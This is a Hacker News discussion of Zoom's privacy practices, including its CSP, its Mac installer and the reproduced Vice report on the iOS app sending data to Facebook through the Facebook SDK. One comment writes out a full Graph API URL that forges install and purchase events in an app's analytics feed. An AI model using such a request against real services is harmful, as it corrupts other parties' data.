StreamBright(2810) about 18 hours ago [-]

>> what is the value proposition for Zoom?

Energy consumption. Half hour hangouts drains 30% of battery 3 hours zoom is roughly 5-10%. UX and performance the two major factors why we chose Zoom.

coder1001(4341) about 23 hours ago [-]

'the best of those, Zoom, is doing very well'

Is Zoom really the best? No other comparable platform out there?

Anyone know how difficult it would be to build something like it on top of aws or a similar cloud?

sakopov(3956) about 22 hours ago [-]

A while ago I remembered reading that a typical video conferencing/streaming setup on AWS has astronomical costs. I don't remember exactly which AWS services were used in the estimate but it seemed very prohibitive for startups.

peterwwillis(2691) about 22 hours ago [-]

> Anyone know how difficult it would be to build something like it

Companies have been trying to build the perfect video chat system for about 30 years. Companies with tens of billions of dollars in cash and more in stock. Almost all of them suck in various ways.

You can stream one audio+video to one person, and you can stream it to multiple people. But then do multiple duplex audio+video streams to multiple people, on multiple platforms, with low CPU, memory, and bandwidth requirements, with user controls, recording, chat, screen sharing, drawing, and 50 other features. Get 49 of them right, and the 50th feature will suck, and your users will hate it and be ready to move to a different product. I think it's one of the most complex user applications that exists.

jamra(10000) about 23 hours ago [-]

Web RTC pretty much handles peer to peer video chat. I think you just need a server to organize the call's, provide chat, and login from

geoffeg(10000) about 23 hours ago [-]

I've been playing around with jitsi (https://jitsi.org/) and have been impressed. I may play around with deploying their server on aws this weekend (via this docker, most likely: https://github.com/jitsi/docker-jitsi-meet)

crazygringo(3914) about 22 hours ago [-]

I used to work in videoconferencing, and Zoom seemingly came out of nowhere and everybody loved it, because people overwhelmingly said it really is the best.

In terms of actual reliable video/audio experience. When evaluating platforms, other videoconferencing solutions simply suffered quality issues more -- taking longer to start, glitches, latency, pausing, echo, and so on.

Also, the hard part isn't building 1-1 video chat. It's having it work with 20 or 200 separate participants.

I have no idea why they're better except that building reliable audio-video at scale turns out to be a really hard problem, and they seemed to focus their engineering on that specifically.

Kind of like file sync was really unreliable until Dropbox decided to focus on building a sync tool that actually 'just worked'. Same philosophy. Zoom is the Dropbox of videoconferencing.

ryeguy_24(3291) about 22 hours ago [-]

I get that privacy is important but this company has become a household name over night. My mom literally just installed Zoom because her friends were talking about it (eyeroll). The company has obviously helped the global economy work remotely and keep productivity moving over the past few months. First, thank you to Zoom for making a great product and continue to work under ridiculous load. Secondly, I agree that privacy is an issue but can we tone it down a bit considering the global situation at stake.

What am I missing? I'm asking humbly. Because it seems like we are complaining about the food at a homeless shelter?

exolymph(430) about 18 hours ago [-]

At what time would it be acceptable to critique Zoom's surveillance practices, in your view? We're not allowed to complain when a useful tool also spies on us?

himaraya(4159) about 22 hours ago [-]

1. Paid service 2. Privacy is important.

catalogia(4333) about 22 hours ago [-]

> I agree that privacy is an issue but can we tone it down a bit considering the global situation at stake.

It seems to me that this is the best possible time to make some noise about Zoom's privacy problems. What better time for that could there be than during a period of mass adoption? What better opportunity to shame a company into compliance than during a global pandemic when the responsibilities of companies to the community is being emphasized?

You might have a point if castigating Zoom for spying on users somehow facilitated the spread of corona, but it doesn't.

tinyhouse(10000) about 17 hours ago [-]

Do Zoom have their own infrastructure or do they run on aws/azure/gcloud?

I think it's amazing how zoom became so popular recently. It's even been approved to be used for Passover Seder dinner by some Rabbis :)

It also very popular in academia and reminds me of Dropbox. When I was a student everyone around me used Dropbox. They developed a great product which competes with Google and other giants. But those were all unpaid users and eventually Dropbox moved their focus to Enterprise. Zoom will soon be in a similar situation.

Rafuino(3790) about 17 hours ago [-]

I had the same question... It looks like they use AWS, though this paper I found is dated May 2013...

https://d24cgw3uvb9a9h.cloudfront.net/static/40580/doc/Zoom-...

quocble(10000) about 15 hours ago [-]

Wow, hackernews is a cesspool of self-serving 'intellectuals'. We're in the middle of a pandemic, which already killed 27 thousands people. And the #1 post is privacy act? Can't you guys admit that you didn't come up with video calling company worth 37 Billion dollars. Maybe it's worth talking the positive impact on Zoom during this crisis.

FridgeSeal(10000) about 15 hours ago [-]

"This company is doing incredibly shady things and exploiting its sudden boost in popularity, so you guys shouldn't criticise it, because it's made soooo much money and you didn't and it's therefore above criticism "

That's how your comment reads. The fact that it's worth so much is almost completely irrelevant, and if anything, should mean they have more responsibility to do the right thing.

zekrioca(4322) about 21 hours ago [-]

Does any one have any knowledge at how Zoom is architected? I know they own some datacenters, but so does Microsoft, which has a worse service than Zoom.

bennofs(10000) about 18 hours ago [-]

An overview is given in their blog post: https://blog.zoom.us/wordpress/2019/06/26/zoom-can-provide-i...

However, I would also like to know if there's more to it. Do they do any server side transcoding? Do they get an advantage by having multiple backend servers connected through good links, having clients connected to the nearest one and routing efficiently through their network? It appears that they use(d) H264 as their codec, are there some technical tricks they use to cope with variable bandwidth (do they use scalable video coding or simulcast)?

blntechie(4254) about 21 hours ago [-]

Zoom have had several controversies with its privacy now and still going strong . Great staying power like Facebook.

The product must be really good. I have never used them more than in couple occasions and found it like any other web conferencing tool in my opinion.

alfalfasprout(10000) about 21 hours ago [-]

Truth is, it has the best video quality I've seen out of any of the video conferencing tools out there by a mile. Only Facetime comes close and it's limited to apple hardware and has more limited screen collaboration tools.

As a result, they're going to have staying power.

Medicalidiot(10000) about 23 hours ago [-]

I am always very hesitant to say anything personal over any video chat medium unless I know it's end to end encrypted. I know that they're not actively watching my video meetings, but it's still causing a chilling effect in how I conduct myself with their service.

angry_octet(3751) about 22 hours ago [-]

Zoom works in China, ergo it is being recorded and analyzed. Automatic voice transcription is a thing.

thekyle(3181) about 21 hours ago [-]

What are some end-to-end encrypted video chat apps? I know Signal offers it but only has one on one calls.

gnusty_gnurc(10000) about 23 hours ago [-]

I've found Jitsi to be more than adequate with no need to download an app onto my computer. Just share the link with my friends!

sakopov(3956) about 22 hours ago [-]

I've tried it yesterday with some friends and in my opinion it's not ready for any serious use. The chat feature looks clunky and sometimes messages don't send on first try, especially the drawing board. Sometimes emojis you send in chat get plastered in the top right corner in about 10 times the size and stay there. I've also had the video feed and all controls disappear in the middle of a live session and the only fix was to close the app and sign-in via invite link. Still happy that something like this exists. Just needs a little bit of polish.

JumpCrisscross(38) about 19 hours ago [-]

> I've found Jitsi to be more than adequate

Just looked it up. Seems to be Chrome only. As a Safari and Firefox user, that ends my decision-making tree with two clicks.

chias(10000) about 18 hours ago [-]

I thought this was going to be about their hilarious CSP, which whitelists the following domains:

    'unsafe-eval'
    'unsafe-inline'
    blob:
    https://*.50million.club
    https://*.adroll.com
    https://*.cloudfront.net
    https://*.google.com
    https://*.hotjar.com
    https://*.zoom.us
    https://*.zoomus.cn
    https://*.zopim.com
    https://ad.lkqd.net
    https://ajax.aspnetcdn.com
    https://apiurl.org
    https://appsforoffice.microsoft.com
    https://assets.zendesk.com
    https://bat.bing.com
    https://cdn.5bong.com
    https://cdn.jsdelivr.net
    https://cdncache-a.akamaihd.net
    https://code.jquery.com
    https://connect.facebook.net
    https://consent.trustarc.com
    https://extnetcool.com
    https://fp166.digitaloptout.com
    https://googleads.g.doubleclick.net
    https://intljs.rmtag.com
    https://pi.pardot.com
    https://px.ads.linkedin.com
    https://ruanshi2.8686c.com
    https://rum-static.pingdom.net
    https://s.dcbap.com
    https://s.yimg.com
    https://s.ytimg.com
    https://s3.amazonaws.com
    https://scout-cdn.salesloft.com
    https://sealserver.trustwave.com
    https://secure-cdn.mplxtms.com
    https://secure.myshopcouponmac.com
    https://snap.licdn.com
    https://sp.analytics.yahoo.com
    https://srvvtrk.com
    https://static.zdassets.com
    https://static2.sharepointonline.com
    https://tag.demandbase.com
    https://tpc.googlesyndication.com
    https://tracking.g2crowd.com
    https://translate.googleapis.com
    https://trk.techtarget.com
    https://unpkg.com
    https://www.comeet.co
    https://www.dropbox.com
    https://www.google-analytics.com
    https://www.googleadservices.com
    https://www.googletagmanager.com
    https://www.gstatic.com
    https://www.youtube.com
    https://d.adroll.mgr.consensu.org
    https://serve2.cheqzone.com
    https://static.ada.support
    'self'
via: https://twitter.com/jasvir/status/1242518507683639296
quickthrower2(1376) about 17 hours ago [-]

Yes unpkg and s3, anyone can get content up on them.

wyoh(4293) about 21 hours ago [-]

Can someone explain the advantages of Zoom over a FOSS solution lake Jitsi Meet? https://meet.jit.si/

nhf(3971) about 19 hours ago [-]

Institutional buy-in and support. When your 40,000 student university's administration declares 'we are using Zoom for online classes and it's been integrated into our class management system by IT', it just gets used.

And that university chooses to use Zoom over another solution for many reason - after-sales support, SLAs for performance and availability, pre-written API integrations for their CMS and student ID system, guarantees from their sales team about regulatory compliance, and the like.

gbrown(10000) about 15 hours ago [-]

One thing I've noticed about it which rubs me the wrong way is that, on Linux, when I exit the application it keeps running in the background. There's no reason that it advertises why this should be necessary, and I don't see any option to disable it. I shouldn't have to manually kill the process to exit a program.

ntnsndr(3942) about 14 hours ago [-]

I agree this is annoying, but you can always Exit the program from the icon in the menubar (works for me on both GNOME and xfce).

mrpippy(3793) about 17 hours ago [-]

I just downloaded Zoom for Mac, saw that it was a .pkg file. Great, I can see what files it installs before I install it.

I open the .pkg, click Continue so it can run its script, then a second later Installer quits and the app launches. What?!

Turns out, Zoom installs the entire app in the 'preinstall' script of the installer package! Inside there's a copy of '7z', and the app is extracted with that. The preinstall script is littered with typos and poor grammar.

I'm not one of those people who thinks that Apple is going to force all Mac software to come through the App Store, but when I see stuff this stupid...I start to wonder.

kccqzy(3192) about 13 hours ago [-]

This is exactly what creeped me out when I first installed Zoom years ago.

Very few people cared when I commented this https://news.ycombinator.com/item?id=20398084

Suffice it to say, I no longer trust Zoom to be running in my regular user account. I have a separate user on my Mac to isolate it. If you have the means, you might even consider a spare computer or a VM to run Zoom.

Wowfunhappy(3954) about 16 hours ago [-]

While I also dislike this type of thing, remember that Zoom's business is built on getting people into calls as quickly as possible. Seconds matter.

So I can totally understand why they would want to use 7zip to shave kilobytes off the download size.

pfranz(10000) about 15 hours ago [-]

I feel like Zoom has a history of doing shady things under the vail of 'ease of use' (referring to the uninstall complaints a few months ago).

I do think on macOS the average user doesn't understand DMG files, run apps from inside the DMG instead of copying them to /Applications and deleting the disk image. My guess is that most people install Zoom after a meeting has started and this was the quickest, fewest dialog method of getting it up and running.

ThePowerOfFuet(10000) about 15 hours ago [-]

Next time, open the .pkg with Pacifier.

skrebbel(3354) about 22 hours ago [-]

Is Zoom-dissing just in fashion these days? In the last few days I've seen these on HN:

- Having the Facebook SDK installed in their iOS app, which sends user data to Facebook even if the user has no Facebook account

- Having a setting, that's off by default, that lets other callers see whether you have the Zoom app in focus

- Having a general 'accessibility over security' engineering attitude, which led them to eg shipping their desktop apps with a builtin HTTP server (and with it a much bigger security surface area), just to skip one extra step in the join-meeting-via-a-zoom-link-flow. They removed it after a backlash, but the engineering attitude probably didn't change.

Now, I agree that all of these are bad. It's OK for outrage to happen over these things, every single one of them are shit and major companies like Zoom need to get their act together.

But I also think that many apps out there do stuff like this. The majority of popular apps, I'd wager. Why is Zoom being singled out? First Vice, now a Harvard blog, a bunch of unsubstantiated tweet storms.. Is it just, en vogue to diss Zoom somehow?

catalogia(4333) about 22 hours ago [-]

> Why is Zoom being singled out?

There is no conspiracy here, calm down. Zoom is popular, therefore people talk about it.

kwesthaus(10000) about 22 hours ago [-]

You are right that many pieces of software infringe on privacy. However, Zoom only recently has become one of the most widespread of these and because of that has only recently begun to affect a significant portion of the population, hence why it is newsworthy.

I think this also has to do with the fact that Zoom is being used for work and school and therefore people have less choice over their use of it. It's not a social network that many people have chosen to start using, it's a piece of software that millions of students and other people are being required to use without consideration of privacy.

say_it_as_it_is(3750) about 23 hours ago [-]

One major problem for Zoom is that it cannot merely focus on its core video conferencing competency while achieving the growth objectives of a publicly traded company. A high-quality video conferencing platform is hard to replicate until it isn't. The amount of talent and energy being spent right now on video conferencing, as a result of remote work, is going to amount to commoditization of high-quality video conferencing. Zoom has maybe another 12 months of juice left. As a result, it's advancing into new categories and will compete with customers very soon.

I'd be very cautious about sharing information with Zoom. You may be showing it where to fish.

dimal(10000) about 19 hours ago [-]

In 12 months, it won't matter if there are 10 other products offering a comparable service. Companies won't want to pay the cost of switching for something that's 'just as good'. It has to be 10x better to justify the switch. Consumers won't switch because everyone else will have Zoom. A videoconferencing app is only useful if both parties have it installed.

osrec(3297) about 22 hours ago [-]

So, you think it'll turn into a generalized software consulting company??

thedance(10000) about 21 hours ago [-]

How hard can it possibly be to replicate? Zoom walked into a market packed with established players and now they own the whole thing. That suggests the barriers to entry aren't so great.

AndyPa32(10000) about 21 hours ago [-]

The paid version has a feature where the organization admins can listen and watch in conversations without anybody noticing or giving consent. I am quite sure that doing so would be illegal where I live (Germany).

ShakataGaNai(4340) about 20 hours ago [-]

Unless you gave 'consent' in your employment contract, or agreement to the companies employee handbook, AUP or similar documentation. This sort of 'agreement to monitoring' is common in a lot of corporations today.

Please don't use your company issued hardware/software/network for something not-work related ... and something you wouldn't feel comfortable sharing with most of your colleagues. There is already a plethora of monitoring going on out there.

cheeze(10000) about 21 hours ago [-]

That's creeeeeeepy.

Androider(4149) about 18 hours ago [-]

I don't think that's true, source? At least I've never seen that as an Enterprise admin.

Based on some quick googling, are you perhaps mistaking Zoom the video conf software with the confusingly similarly named ZOOM International, which does call-center / agent software but is a completely unrelated and a much older company?

xenonite(4263) about 18 hours ago [-]

If you are looking for a source of these claims, let me give you one: https://www.eff.org/deeplinks/2020/03/what-you-should-know-a...

> Administrators also have the ability to join any call at any time on their organization's instance of Zoom, without in-the-moment consent or warning for the attendees of the call.

graphememes(4303) about 18 hours ago [-]

Citation required, cannot find this in the feature list, support documentation, or on the pricing page.





Historical Discussions: Zoom iOS app sends data to Facebook even if you don't have a Facebook account (March 26, 2020: 1340 points)

(1408) Zoom iOS app sends data to Facebook even if you don't have a Facebook account

1408 points 2 days ago by softwaredoug in 3487th position

www.vice.com | Estimated reading time – 4 minutes | comments | anchor

As people work and socialize from home, video conferencing software Zoom has exploded in popularity. What the company and its privacy policy don't make clear is that the iOS version of the Zoom app is sending some analytics data to Facebook, even if Zoom users don't have a Facebook account, according to a Motherboard analysis of the app.

This sort of data transfer is not uncommon, especially for Facebook; plenty of apps use Facebook's software development kits (SDK) as a means to implement features into their apps more easily, which also has the effect of sending information to Facebook. But Zoom users may not be aware it is happening, nor understand that when they use one product, they may be providing data to another service altogether.

'That's shocking. There is nothing in the privacy policy that addresses that,' Pat Walshe, an activist from Privacy Matters who has analyzed Zoom's privacy policy, said in a Twitter direct message.

Upon downloading and opening the app, Zoom connects to Facebook's Graph API, according to Motherboard's analysis of the app's network activity. The Graph API is the main way developers get data in or out of Facebook.

Do you know anything else about data selling or trading? We'd love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on [email protected], or email [email protected]

The Zoom app notifies Facebook when the user opens the app, details on the user's device such as the model, the time zone and city they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user's device which companies can use to target a user with advertisements

The data being sent is similar to that which activist group the Electronic Frontier Foundation (EFF) found the app for surveillance camera vendor Ring sent to Facebook.

Will Strafach, an iOS researcher and founder of privacy-focused iOS app Guardian confirmed Motherboard's findings that the Zoom app sent data to Facebook.

'I think users can ultimately decide how they feel about Zoom and other apps sending beacons to Facebook, even if there is no direct evidence of sensitive data being shared in current versions,' he told Motherboard in a Twitter direct message.

'That's shocking. There is nothing in the privacy policy that addresses that.'

Zoom is not forthcoming with the data collection or the transfer of it to Facebook. Zoom's policy says the company may collect user's 'Facebook profile information (when you use Facebook to log-in to our Products or to create an account for our Products),' but doesn't explicitly mention anything about sending data to Facebook on Zoom users who don't have a Facebook account at all.

Facebook told Motherboard it requires developers to be transparent with users about the data their apps send to Facebook. Facebook's terms say 'If you use our pixels or SDKs, you further represent and warrant that you have provided robust and sufficiently prominent notice to users regarding the Customer Data collection, sharing and usage,' and specifically for apps, 'that third parties, including Facebook, may collect or receive information from your app and other apps and use that information to provide measurement services and targeted ads.'

Zoom's privacy policy says 'our third-party service providers, and advertising partners (e.g., Google Ads and Google Analytics) automatically collect some information about you when you use our Products,' but does not link this sort of activity to Facebook specifically.

Zoom did not respond to a request for comment.

Zoom has a number of other potential privacy issues too. As the EFF laid out, hosts of Zoom calls can see if participants have the Zoom window open or not, meaning they can monitor if people are likely paying attention. Administrators can also see the IP address, location data, and device information on each participant, the EFF added.

Subscribe to our cybersecurity podcast, CYBER.




All Comments: [-] | anchor

phwd(1212) 1 day ago [-]

At the risk of pointing to the documentation,

graph-facebook-com/app/activities is an endpoint used by 3rd party developers working with Facebook SDKs to send app analytic data for insights.

https://developers.facebook.com/docs/marketing-api/app-event... http://www.facebook.com/analytics https://business.facebook.com/events_manager/app/events

This is what a URL can look like.

graph-facebook-com/1106907002683888/activities?method=POST&event=MOBILE_APP_INSTALL&anon_id=1&advertiser_tracking_enabled=1&application_tracking_enabled=1&custom_events=[{%22_eventName%22:%22fb_mobile_purchase%22,}]

If you click the above you'll litter my analytics feed for my app 1106907002683888 with junk data.

Just in case, someone was looking for the specific call talked about because I couldn't find it linked in Vice's article.

floatingatoll(4062) 1 day ago [-]

It's generally not a good idea to clearly "wink wink" indicate how to abuse an endpoint, since that abuse can be easily interpreted under various criminal laws as malicious and worthy of prosecution. You could protect yourself against such accusations with more neutral language, starting with rewording the "litter" sentence.

justlexi93(10000) 1 day ago [-]

The very idea of sending someone's data to anywhere without explicit permission SHOULD BE AGAINST THE LAW.

xenonite(4263) 1 day ago [-]

It is, in Europe with the GDPR.

ChrisMarshallNY(4343) 1 day ago [-]

Are they using a Facebook dependency? FB has a couple of libraries popular for use as UI libraries.

I didn't think they phoned home, but I could be wrong.

RandallBrown(3870) 1 day ago [-]

It's probably used for install tracking.

Apple doesn't provide a way to know how a user found your app, but Facebook does. This is why the app I work on uses the Facebook SDK.

Basically, we want to know how effective our Facebook ads are at getting actual installs.

floatboth(4340) 1 day ago [-]

They're using the Facebook SDK. The one for, well, interacting with Facebook's actual social network.

danabramov(846) 1 day ago [-]

If you mean React, it doesn't have any telemetry, and never had. (You can audit the code on GitHub, it's open source.)

The SDK in question is Facebook SDK which is completely separate from user interface libraries.

itronitron(4187) 1 day ago [-]

Are you asking about React and GraphQL? I'm not sure whether they phone home but their development was certainly subsidized by abusing people's privacy.

ddrt(10000) about 22 hours ago [-]

Is this article overreacting to something that sounds like a Facebook tracking pixel?

karljtaylor(10000) about 20 hours ago [-]

yes, yes it is.

liquidify(10000) 1 day ago [-]

Didn't zoom get their start claiming to be a privacy conscious company?

dylan604(3585) 1 day ago [-]

If they did, what's that matter? Google started with a tag line of 'Don't be evil'. 9 out of 10 doctors used to say smoking was good for your health. Choosy moms choose JIF (not GIF).

rococode(3217) 1 day ago [-]

If you have a Facebook account and are curious what other apps and websites are sending data about you to Facebook, check out this link:

https://www.facebook.com/off_facebook_activity/activity_list

(click the area with the various app & website icons to expand into a more detailed view)

I was pretty surprised the first time I came across that list, there are a lot of apps on there that I never did a Facebook login with. For example right now I see that a map app I downloaded when I was travelling last year but only opened once or twice has sent 395 'interactions', the latest of which was 3 days ago. Actually, I should probably delete that now haha. Also, I'm using Firefox with the Facebook container, Privacy Badger, and uBlock Origin, and there are still many websites listed.

koyote(10000) 1 day ago [-]

So I do not have facebook installed on my phone but I do have instagram and whatsapp.

A large amount of phone apps seem to appear in that list. I guess Whatsapp/Instagram creates a fingerprint of my device and then uses that for tracking?

jmiserez(4330) 1 day ago [-]

You can disable it under: More Options -> Manage Future Activity: https://www.facebook.com/off_facebook_activity/future_activi...

st3fan(2391) 2 days ago [-]

EVERY. SINGLE. APP. THAT. INCLUDES. THE. FACEBOOK. SDK.

Even if you don't log in. The Facebook SDK sends data back.

Hook your device up to an intercepting proxy and start up a few apps. 99% of them do this.

I really wish Apple would put an end to this.

leipert(4319) 1 day ago [-]

This was presented at the 36C3 last year: https://media.ccc.de/v/36c3-10693-no_body_s_business_but_min...

I assume a lot of people just "slap" the SDK in there and call it a day and it starts sending data.

megablast(3889) 1 day ago [-]

Can't apps start up the facebook SDK after someone has clicked the facebook login button? If someone has already logged in with facebook, set a flag in NSUserDefaults, and start the sdk then.

kube-system(10000) 1 day ago [-]

Tons of websites do this as well

wideasleep1(10000) 1 day ago [-]

Examples on Android for 'an intercepting proxy' are No Root Firewall, and even better, the paid/donate version of Netguard, which allows you to permanently kill these errant calls. Additionally, you can disable Google Services Framework with it too, if you'd like to try running your Android without Google tethered and watching, while you enjoy sweet, well-designed FOSS apps and services.

pergadad(10000) 1 day ago [-]

Is this automatically part of any app using react/react native?

ChrisMarshallNY(4343) 1 day ago [-]

If they did, it would raise a ruckus.

There's a lot of developers that rely on these dependencies, and just blocking them would cause a major backlash.

ozmbie(10000) 1 day ago [-]

I would love if Apple started treating app analytics like they do my GPS location or my camera permissions. Basically, if apps want to send analytics, they must go through an iOS API.

Then as a user, I can inspect what apps are sending and how frequently. I should be able to block requests or set myself as anonymous. Or allow apps for certain amounts of time etc.

yellow_postit(4080) 1 day ago [-]

This is equivalent to including Google Analytics or any 3P analytics platform.

qserasera(10000) 1 day ago [-]

Thank you st3fan. I will reference your comment in the future.

AnthonyMouse(4234) 1 day ago [-]

> I really wish Apple would put an end to this.

This is what really gives lie to the whole walled garden thing. Its selling point is supposed to be in Apple preventing things like this, but here we are in reality and they don't. Meanwhile they do e.g. prevent Signal from replacing Apple's default app for SMS, which has no purpose other than to create barriers for cross-platform competitors to the default apps.

golergka(2697) 1 day ago [-]

As an app developer, I think that I've done 'Facebook SDK integration' task over 10 times at the very least. I don't think I'm the only one. It's unrealistic to expect a mobile app not to offer a user the option to login through Facebook.

And yet, we don't need to integrate Facebook's binary blobs to use this SDK's main features. How about we implement the open version of Facebook SDK that uses their APIs but doesn't do anything that we don't want it to?

arendtio(10000) about 19 hours ago [-]

Apple is busy deleting localStorage data from PWA users...

For those who did not read about it: https://andregarzia.com/2020/03/private-client-side-only-pwa...

mpclark(4322) 1 day ago [-]

I'm surprised Zoom is happy for Facebook to know exactly who its customers are. This is information that could be used against the company at some point, for example if FB made a video conferencing play.

ElectrodesD(10000) about 24 hours ago [-]

Apple isn't interested in that as well as most of the corporations out there. Data is one of the most valuable assets and this is easy cash flow.

ladfjkl(10000) 1 day ago [-]

Has anyone tried the Lockdown app? https://9to5mac.com/2019/07/24/lockdown-ios-firewall-open-so...

It looks promising, and has been posted to HN a few times, but nobody has commented on it. https://news.ycombinator.com/item?id=20519456

tdstein(10000) 1 day ago [-]

This! It isn't just Zoom. It's a known 'feature' of the Facebook SDK.

product50(10000) 1 day ago [-]

The world is facing such a massive crisis, people are getting laid off, and here on HN/Vice, they are discussing why a VC app is sending an anonymized link to Facebook.

ThePowerOfFuet(10000) 1 day ago [-]

There are so many other alternatives that don't sell out user privacy, so calling them out for slimy shit like this is never inappropriate.

lacker(1782) 1 day ago [-]

Does it really make sense to call it a 'VC app' when Zoom is a public company worth more than Ford or GM?

ncr100(10000) 1 day ago [-]

Correct. And, People who like Power are seeing an Opportunity to get more power.

ANY TIME you can predict what people will do, e.g. be shut-ins, that is an opportunity to be exploited for better or worse.

IF YOU CAN MAKE PEOPLE DO things, en masse, then you're IN POWER. Congratulations.

Zoom giving data to Facebook during a crisis means Facebook can track your critical social network members.

I do expect the crisis will pass, and I don't want to have LOST any more of my privacy as a by-product.

qwtel(4334) 1 day ago [-]

More breaking news: Almost every website sends data to google, even if you don't have a google account.

Singling out Facebook as the privacy nemesis while giving a free pass to 'cute' conglomerates like Google reeks of class hatred and flavor-of-the-month-style pseudo journalism.

Opening vice.com link will send data to Google.

randomsearch(4327) 1 day ago [-]

Whataboutism, and this is about Zoom (on trend) and related to its other fails.

kpierce(10000) 1 day ago [-]

Their desktop version is not much better.

https://securityboulevard.com/2020/03/using-zoom-here-are-th...

rochak(4063) about 20 hours ago [-]

It has been known for a while now to not touch their desktop app with even a ten feet pole. The best bet is using the web app.

bluesign(10000) 2 days ago [-]

Facebook is also ad & analytics network. You can replace facebook, with any ad/analytics network and it will still be true.

Probably vice's mobile app, or website, or any other app with ads, sharing this information.

Problem is trying to create fake news like this, with using popular names like zoom and facebook. (When I mean fake news, this is not news at all, things you can see on google analytics vs this is not even comparable)

otterley(3512) 2 days ago [-]

Please don't misuse the term 'fake news.' Fake news has a specific meaning: false stories that have no basis in fact but have tantalizing headlines meant to attract attention.

Attempting to change the meaning of the term dilutes its importance and introduces unnecessary confusion.

sneak(2447) 2 days ago [-]

Reminder: The NextDNS iOS app allows you to monitor and block these types of requests from all of your apps, via their DNS logging/filtering. (You can also configure the retention on the DNS logging, so as to not cause more toxic waste data.)

I can't recommend it enough. Until/unless we get something like Little Snitch for the phone (are you listening, Apple?!), this is the next best thing.

proactivesvcs(10000) 1 day ago [-]

Blokada has a similar feature set, with support for bundled advert/spyware/social media block lists as well as your own.

wackget(10000) 1 day ago [-]

On the NextDNS website:

> 'Try it now for free. No sign up required.'

> I click the button

> 'Sign In. Don't have an account? Sign up.'

zentiggr(10000) 1 day ago [-]

How does its blocking compare to Blockada?

claudeganon(3646) 2 days ago [-]

Are there any guides for running your own setup with similar filtering functionality? Not keen to run all my traffic through some unknown VPN.

om42(10000) 1 day ago [-]

NextDNS is great, set it up on all my devices a few back when there was a post on here about it. Uninstalled a few apps just from seeing the number of requests they were sending even when I didn't use those apps frequently.

Like its mentioned in this discussion, using the FB SDK will result in apps sending requests to FB. Found a banking app I use was doing this...

totaldude87(3428) 1 day ago [-]

THIS! , thank you! just installed and found tons of queries to Uber (never used uber in past many months) , uninstalled it finally!

bosswipe(10000) 1 day ago [-]

In my experience developers that integrate the FB SDK into their apps just copy-paste whatever code snippet Facebook tells them to do, which is always maximum data capture, without thinking of any of the implications. There's usually a way to limit data leakage while using the minimum FB functionality you want, such as only using FB for login without sending every damn app event to Facebook.

rochak(4063) about 20 hours ago [-]

How is this not reviewed by other developers who might not be as negligent as the one who just copied the code?

throw03172019(4341) 1 day ago [-]

Is this for advertising reasons (I.e. closing the loop)?

badwolf(10000) 1 day ago [-]

Facebook login.

Edit: Also attribution.

mikorym(4263) 1 day ago [-]

It's interesting how all the infosec experts are zooming in on Zoom and providing details that otherwise may have gone unnoticed for a long time.

saagarjha(10000) 1 day ago [-]

Because a lot of people are using Zoom regularly?

godelski(4310) 2 days ago [-]

> There is nothing in the privacy policy that addresses [that data is being sent to Facebook]

> The Zoom app notifies Facebook when the user opens the app, details on the user's device such as the model, the time zone and city they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user's device which companies can use to target a user with advertisements

So Zoom is sending the fingerprints of mobile users to Facebook. Which helps Facebook better track users across the internet. Not only this, but Zoom is not disclosing this information (though it isn't like people read TOS and would be aware of this anyways).

Can we just stop sending data everywhere? If you don't need it, don't gather it.

tw04(10000) 1 day ago [-]

Can we stop sharing data with facebook and google or literally ANY third party unless absolutely necessary? And if it is absolutely necessary, let users opt out and tell them what feature they lose?????

Zoom is quickly gaining a reputation for doing the wrong thing anytime they have a choice between right and wrong.

somethoughts(10000) 1 day ago [-]

Similar to how we have organizations which can certify whether produce is organic or not, we need organizations which can certify whether apps and websites are certified ad tracking free.

SlowRobotAhead(10000) 1 day ago [-]

You think Zoom is doing it for fun? This is a revenue source right?

orasis(4317) about 23 hours ago [-]

Mobile app developers need to gather install/purchase data so they can optimize user acquisition spend. Most are not using PII so I don't see any problem.

KennethSRoberts(10000) 1 day ago [-]

pi-hole

mikorym(4263) 1 day ago [-]

My opinion about this is that many apps and websites don't have a real product offering. FB, Dropbox, Twitter and others are more of a service offering than a product offering and hence everything is rooted around services and tracking services and, finally, just plain old tracking.

adam_fallon_(10000) 1 day ago [-]

One thing i'll note here as to a potential reason why they do this

I just recently attempted to set up Facebook adverts for an app I developed. When it came time for me to set the metric up I obviously chose 'App Installs' as my metric to track.

To do this, Facebook told me I needed to install the Facebook SDK in my app to attribute an adverts conversion.

I didn't end up running the ad, but I can see why companies potentially have the SDK embedded in their apps to track ad-spend, hence the phoning-home to Facebook.

Edit: Just so people don't have to dig to verify;

https://en-gb.facebook.com/business/help/2083260191704068?id...

robin_reala(30) 2 days ago [-]

The good thing is that this is illegal in the EU, so they can just be sued for problematic amounts of money.

m463(10000) 1 day ago [-]

The kindle app contacts facebook too. All KINDS of webpages and apps contact facebook. It's a mess that I only figure legislation can help correct.

leggomylibro(10000) 2 days ago [-]

It's past time for us to get serious and apply HIPAA-style protection to the storage and transmission of PII, without exemptions.

Companies like Facebook will complain loudly that they won't be able to survive, but that is not our problem. If we pass legislation with teeth, they will need to change their business model. That would be the point.

6nf(10000) 1 day ago [-]

> If you don't need it, don't gather it.

What if they need it... to make more money?

andrepd(3744) 1 day ago [-]

>Can we just stop sending data everywhere? If you don't need it, don't gather it.

We're not gonna get there with asking nicely. We need legislation, with teeth (read, fines worth 6 months or 1 year global turnover)

catacombs(2414) about 24 hours ago [-]

> Can we just stop sending data everywhere? If you don't need it, don't gather it.

But...but... consumer data is a gold mine! We have to sell it! Who will think of the shareholders?

HenryBemis(4292) 1 day ago [-]

I have been using Android for the last few years (with NoRoot Firewall installed) and before that I was using iPhone (jailbroken with FirewallIP installed).

95% of the applications installed (on both Android & iPhone), when they open 'talk'/send a ping to Facebook. That includes all air-companies, Spotify, anything you can imagine. The only 'clean' apps I have found are Amazon, eBay, Dropbox, Signal, Telegram, Skype.

Anyone using Android, do yourselves the favor, install (free) NoRoot Firewall. Once you 'Start' the firewall check the tabs 'Logs' and 'Pending' and you will be surprised on what your apps are doing, especially if you leave them running in the background.I also use it to block trackers, ads, FB, etc.

fmjrey(10000) 2 days ago [-]

On Android the first thing you notice when you install a firewall such as NetGuard is the amount of applications that try to access facebook servers. It's mind boggling, probably 50% are doing so. And I'm not even on facebook at all.

panpanna(10000) 1 day ago [-]

NetGuard is fantastic, but is there a way to automatically disable trackings sites without selecting them manually for every app?

